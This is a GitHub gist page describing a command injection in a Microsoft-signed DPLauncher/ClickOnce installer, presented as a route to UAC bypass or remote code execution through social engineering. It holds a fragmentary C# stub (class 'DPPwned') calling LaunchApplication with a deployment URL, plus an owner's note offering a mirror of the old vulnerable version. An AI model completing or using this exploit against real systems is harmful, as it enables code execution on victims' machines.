Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Command injection in MS' One Step / DPLauncher / "Get ready for the Internet" application, for UAC / RCE through social engineering using MS signed exe / clickonce.
using System;
using System.Runtime.InteropServices;
class DPPwned {
public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags);
public static void Main() {
Also works in Edge!
Mirror of the files:

This comment has been minimized.

Copy link
Owner Author

commented Oct 22, 2016

Please note that the version of DPLauncher on has now been fixed. Exploitation will now require hosting the files yourself. Here's a mirror of the old version:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.